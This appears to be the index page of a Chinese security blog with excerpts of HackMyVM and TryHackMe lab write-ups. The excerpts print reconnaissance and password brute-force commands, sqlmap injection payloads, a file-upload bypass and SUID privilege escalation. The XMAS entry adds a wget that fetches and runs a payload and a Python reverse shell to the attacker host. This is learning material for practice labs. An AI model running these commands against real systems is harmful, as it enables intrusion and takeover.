oracle-padding-attack

2024-07-16 #sec 

在打tryhackme的New-York-Flankees房间的时候遇见了这个攻击方式,没见过,学习一下

前置知识

块密码

在分组密码加密领域,数据一次加密一个块,不同算法的块长度各不相同。

当要加密的数据长度不是块长度的倍数时,就需要填充。

高级加密标准 (AES)

数据加密标准 (DES)

三重数据加密标准 (3DES)

Blowfish

Twofish

填充方案

如前所述,分组密码采用固定大小的块,当明文不是块大小的倍数时需要填充。存在多种填充技术,但在本次攻击中,我们的重点是 PKCS#7。

阅读全文 →

HMV_airbind

2024-06-15 #sec/hackmyvm 

端口扫描

~ ➤ nmap -Pn -sT 192.168.124.210 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-14 23:47 EDT
Nmap scan report for 192.168.124.210
Host is up (0.0047s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE    SERVICE
22/tcp filtered ssh
80/tcp open     http

Nmap done: 1 IP address (1 host up) scanned in 7.38 seconds

22端口是filtered…没注意这个细节 HMV_airbind_image_1

web_80

目录扫描

扫目录扫出来,状态不太行,应该先判断一下优先查看哪些目录

/images               (Status: 301) [Size: 319] [--> http://192.168.124.210/images/]   
/.php                 (Status: 403) [Size: 280]
/about.php            (Status: 302) [Size: 0] [--> login.php]
/login.php            (Status: 200) [Size: 1924]
/logos.php            (Status: 200) [Size: 1977]
/stats.php            (Status: 302) [Size: 0] [--> login.php]
/index.php            (Status: 302) [Size: 0] [--> login.php]
/.html                (Status: 403) [Size: 280]
/screenshots          (Status: 301) [Size: 324] [--> http://192.168.124.210/screenshots/]
/scripts              (Status: 301) [Size: 320] [--> http://192.168.124.210/scripts/]  
/registration.php     (Status: 302) [Size: 0] [--> login.php]
/includes             (Status: 301) [Size: 321] [--> http://192.168.124.210/includes/] 
/db                   (Status: 301) [Size: 315] [--> http://192.168.124.210/db/]       
/logout.php           (Status: 302) [Size: 0] [--> .]
/styles               (Status: 301) [Size: 319] [--> http://192.168.124.210/styles/]   
/settings.php         (Status: 302) [Size: 0] [--> login.php]
/auth.php             (Status: 200) [Size: 0]

db文件泄露

在db目录下找到一个sqlite的转储文件,使用在线工具解析一下,发现user HMV_airbind_image_2

阅读全文 →

HMV_adria

2024-05-14 #sec/hackmyvm 

靶机启动

68 ◯  arp-scan -l
Interface: ens33, type: EN10MB, MAC: 00:0c:29:31:02:fd, IPv4: 192.168.244.101
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.244.99  f6:39:4a:3d:95:18       (Unknown: locally administered)
192.168.244.102 08:00:27:22:48:cd       PCS Systemtechnik GmbH
192.168.244.190 ca:a7:78:4d:50:e1       (Unknown: locally administered)

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.273 seconds (112.63 hosts/sec). 3 responded

端口扫描

> nmap 192.168.244.102 -Pn -sT -p- --min-rate 4000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-16 20:50 EDT
Nmap scan report for 192.168.244.102
Host is up (0.046s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

先简单看一下各个服务

> whatweb adria.hmv
http://adria.hmv [200 OK] Apache[2.4.57], Bootstrap, Cookies[INTELLI_7da515443a], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.57 (Debian)], IP[192.168.244.102], JQuery, MetaGenerator[Subrion CMS - Open Source Content Management System], Open-Graph-Protocol, PoweredBy[Subrion], Script, Title[Blog :: Powered by Subrion 4.2], UncommonHeaders[x-powered-cms], X-UA-Compatible[IE=Edge]

smb_139+445

枚举一下smb

阅读全文 →

area51

2024-04-16 #sec/hackmyvm 

主机发现

~/workspace sudo arp-scan -I ens33 -l
Interface: ens33, type: EN10MB, MAC: 00:0c:29:a1:f0:49, IPv4: 192.168.89.15
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.89.13   08:00:27:96:66:e2       PCS Systemtechnik GmbH
192.168.89.99   f6:39:4a:3d:95:18       (Unknown: locally administered)
192.168.89.247  ca:a7:78:4d:50:e1       (Unknown: locally administered)

端口扫描

~/workspace sudo nmap 192.168.89.13 -Pn -sT -p- -A --min-rate=10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-16 07:34 EDT
Nmap scan report for 192.168.89.13
Host is up (0.0025s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
|   3072 de:bf:2a:93:86:b8:b3:a3:13:5b:46:66:34:d6:dc:b1 (RSA)
|   256 a9:df:bb:71:90:6c:d1:2f:e7:48:97:2e:ad:7b:15:d3 (ECDSA)
|_  256 78:75:83:1c:03:03:a1:92:4f:73:8e:f2:2d:23:d2:0e (ED25519)
80/tcp   open  http        Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: FBI Access
8080/tcp open  nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (application/json).
MAC Address: 08:00:27:96:66:E2 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   2.52 ms 192.168.89.13

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.70 seconds

web_80

~/workspace whatweb 192.168.89.13
http://192.168.89.13 [200 OK] Apache[2.4.51], Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.51 (Debian)], IP[192.168.89.13], JQuery[2.1.3], PasswordField, Script, Title[FBI Access]
~/workspace whatweb 192.168.89.13:8080
http://192.168.89.13:8080 [400 Bad Request] Country[RESERVED][ZZ], IP[192.168.89.13]

HMV_area51_image_1

阅读全文 →

slowman

2024-02-15 #sec/hackmyvm 

端口扫描

网络环境问题,还是得 nmap 的全端口扫描

HMM_slowman_image_1

ftp 匿名登录

HMM_slowman_image_2

爆破 mysql 密码

trainerjeff 接下来得看 mysql 了 hydra 好慢 换了 ncrack 试试

sudo ncrack -T5 -v -u trainerjeff -P /usr/share/wordlists/rockyou.txt mysql://192.168.10.8
sudo  medusa -h 192.168.10.8 -u trainerjeff -P /usr/share/wordlists/rockyou.txt -M mysql
sudo hydra -l trainerjeff -P /usr/share/wordlists/rockyou.txt 192.168.10.8 mysql

没出来, 吐了, 每分钟八次. 太慢了. 看 wp 算了 假装枚举出来了 HMM_slowman_image_3

枚举 mysql 信息

sudo mysql -h 192.168.10.8 -u trainerjeff -psoccer1

HMM_slowman_image_4

|  1 | gonzalo     tH1sS2stH3g0nz4l0pAsSWW0rDD!! 
|  2 | $SECRETLOGINURL /secretLOGIN/login.html

HMM_slowman_image_5

web 枚举

HMM_slowman_image_6 进入之前 mysql 中发现的隐藏目录, 使用发现的用户名密码登录, 后面发现这个也能登录 ssh HMM_slowman_image_7 进去之后有个压缩包, 有密码 使用 john HMM_slowman_image_8 解压之后是一个账号和密码, 猜测是 ssh 的

阅读全文 →

XMAS

2024-02-14 #sec/hackmyvm 

靶机, 启动

192.168.10.16

端口扫描

HMM_XMAS_image_1

HMM_XMAS_image_2

web 服务

目录扫描

HMM_XMAS_image_3

在主页的下面发现了一个上传点, 直接上传反弹 shell

HMM_XMAS_image_4

使用 nc 失败, 换成了 webshell

HMM_XMAS_image_5

HMM_XMAS_image_6 然后还是用了 meterpreter

wget http://192.168.10.11:8000/shell.elf -O /tmp/shell.elf&&chmod 777 /tmp/shell.elf

www-data ,进一步收集信息

/home/alabaster/nice_list. txt

HMM_XMAS_image_7

这有个 python 代码,. 在 linpeas. sh 枚举之后发现是定时任务, 并且是可写的

HMM_XMAS_image_8

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.10.11",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")' > nice_or_naughty.py


echo 'import subprocess; subprocess.call(["/tmp/newshell.elf"])' > nice_or_naughty.py

又是这样子不稳定的 shell

HMM_XMAS_image_9

上传一个 socat 二进制文件上去算了

阅读全文 →

vivifytech

2024-02-13 #sec/hackmyvm 

192.168.10.12

端口扫描

HMM_vivifytech_image_1

web目录扫描

进一步扫描 WordPress 下的目录

HMM_vivifytech_image_2

发现敏感文件 secret. txt,

HMM_vivifytech_image_3

根据收集的用户名, 密码爆破 ssh

HMM_vivifytech_image_4

HMM_vivifytech_image_5|400

HMM_vivifytech_image_6

HMM_vivifytech_image_7

sarah:bohicon

USER. txt PWD

HMM_vivifytech_image_8

收集泄露信息,横向移动

jresig secret HMM_vivifytech_image_9

HMM_vivifytech_image_10

sarah@VivifyTech:~/.gnupg/crls.d$ cat DIR.txt
v:1:

在用户目录里面发现了 TASK. txt 文件 下次应该直接全局找一下. txt 文件

HMM_vivifytech_image_11

sarah@VivifyTech:~/.private$ cat Tasks.txt
- Change the Design and architecture of the website
- Plan for an audit, it seems like our website is vulnerable
- Remind the team we need to schedule a party before going to holidays
- Give this cred to the new intern for some tasks assigned to him - gbodja:4Tch055ouy370N

利用 sudo git 提权

HMM_vivifytech_image_12

阅读全文 →

zon

2024-02-11 #sec/hackmyvm 

启动机器

得指定网络接口

sudo arp-scan -I eth5 -l

HMM_zon_image_1

端口扫描

sudo rustscan -a 192.168.10.13 -r 1-65535 -t 8000 --ulimit 5000

sudo nmap 192.168.10.13 -sT -Pn -p22,80 -sV -sC -O -oN portscan/norm


sudo nmap 192.168.10.13 -sT -Pn -p22,80 --script=vuln -oN portscan/vuln

HMM_zon_image_2

HMM_zon_image_3

利用空格绕过文件上传过滤

HMM_zon_image_4

测试之后是检查文件名, 而不是文件头, 而且图片马不能正常解析 HMM_zon_image_5|750

  • 非 jpeg 格式的无法上传 HMM_zon_image_6

  • jpeg 格式能够正常上传 HMM_zon_image_7 HMM_zon_image_8 后面尝试了图片马, 但是没有正常解析, 无法执行命令

使用空格绕过

"webshell.jpeg .php"

HMM_zon_image_9

一句话木马, 获得 webshell HMM_zon_image_10 freddie

阅读全文 →

quick

2024-02-10 #sec/hackmyvm 

host discovery

主机发现, 重置了 wsl 的环境之后, 发现能够使用 arp-scan 了 HMM_quick_image_1 前后对比 HMM_quick_image_2

192.168.10.12

port scan

只有一个 80 端口 HMM_quick_image_3

服务版本, 默认脚本, 操作系统扫描 HMM_quick_image_4 漏洞扫描 HMM_quick_image_5

利用远程包含获得 shell

RFI HMM_quick_image_6 HMM_quick_image_7

user. txt PWD

HMM_quick_image_8 HMM_quick_image_9

use SUID file to get root

find / -type f -perm -u=s 2>/dev/null 发现一个suid的 php

./usr/bin/php7.0 -r "pcntl_exec('/bin/sh', ['-p']);"

root. txt PWD

HMM_quick_image_10

vinylizer

2024-02-10 #sec/hackmyvm 

主机发现

使用 nmap 进行主机发现[[THM_Nmap Live Host Discovery(活动主机发现)]]

sudo nmap 192.168.10.1/24 -PA -sn -oN portscan/discovery.nmap

HMM_vinylizer_image_1

192.168.10.10

端口扫描

HMM_vinylizer_image_2 HMM_vinylizer_image_3

web 侦查

HMM_vinylizer_image_4

利用登录页面的 sql 注入

sqlmap

sudo sqlmap http://192.168.10.10/login.php --data "username=admin&password=admin&login="

HMM_vinylizer_image_5

---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin' AND (SELECT 7762 FROM (SELECT(SLEEP(5)))rBJA) AND 'mJfQ'='mJfQ&password=admin&login=
---

查看所有数据库

 sudo sqlmap http://192.168.10.10/login.php --data "username=admin&password=admin&login=" --dbs

HMM_vinylizer_image_6 查看数据库的表信息

 sudo sqlmap http://192.168.10.10/login.php --data "username=admin&password=admin&login=" --tables -D vinyl_marketplace

HMM_vinylizer_image_7 查看某一个表的列信息

sudo sqlmap http://192.168.10.10/login.php --data "username=admin&password=admin&login=" --columns -D vinyl_marketplace -T users

HMM_vinylizer_image_8 查看对应列的信息

阅读全文 →